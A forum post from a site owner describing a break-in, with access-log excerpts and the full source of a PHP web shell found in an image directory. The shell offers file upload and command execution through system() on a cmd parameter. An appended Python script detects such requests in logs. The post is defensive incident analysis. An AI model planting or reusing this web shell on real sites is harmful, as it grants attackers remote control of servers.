The next standout from the logs is a file called index.php showing up in the images directory:
Code:
94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Code:
<?php
if(@$_REQUEST["id"]== 'jj')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if(@$_REQUEST["id"]== 'pp')
{
system($_GET["cmd"]);
}
?>
Code:
94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Code:
94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=smiley HTTP/1.1" 200 92 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=folder HTTP/1.1" 200 90 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=file HTTP/1.1" 200 93 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
However, that's when I started combing through the logs, found all this, and put the site in maintenance mode. Any advice on how to get the site up and running securely again? I'm thinking obviously a fresh file install; what's the best way to do that with the database? Can I just dump the fresh download and replace the config files? This clearly attacked my images dir, but I need those; I've searched through the directory and found no more .php files in it.
Thanks in advance for any advice or guidance.
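Detection logic over the kind of access-log lines quoted above, as an added example that is not part of the original post: it flags every request that was served a PHP script out of the image directory (which should hold only static files) and marks POSTs and cmd= parameters on those scripts, then lists the script paths the log says to look for on disk. The sample lines are constructed from the entries above; the STATIC_DIRS tuple and the benign 10.0.0.5 request are assumptions.

```python
import re

# Constructed sample modelled on the log entries in the post (IP, timestamps and
# paths are the ones quoted there); the last line is an assumed benign image request.
SAMPLE_LOG = """\
94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0"
94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0"
10.0.0.5 - - [11/May/2017:01:02:00 -0400] "GET /image/data/atlarge/logo.png HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# Apache combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Assumed: directories that must only serve static files; any executed script here is a finding.
STATIC_DIRS = ("/image/",)
SCRIPT_EXTS = (".php", ".phtml", ".php5")

def parse_line(line):
    """Return a dict with ip, ts, method, path, query, status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec

def find_suspicious(log_text):
    """Flag successful requests for scripts under a static-only directory."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["status"] != "200":
            continue
        if rec["path"].startswith(STATIC_DIRS) and rec["path"].lower().endswith(SCRIPT_EXTS):
            reason = "script served from static directory"
            if rec["method"] == "POST":
                reason += "; POST (possible upload)"
            if "cmd=" in rec["query"]:
                reason += "; cmd parameter (command execution)"
            findings.append((rec["ip"], rec["ts"], rec["method"], rec["target"], reason))
    return findings

def script_paths(findings):
    """Distinct script paths from the findings: the files to check for on disk."""
    return sorted({f[3].partition("?")[0] for f in findings})

if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for hit in hits:
        print(*hit)
    print("check on disk:", script_paths(hits))
```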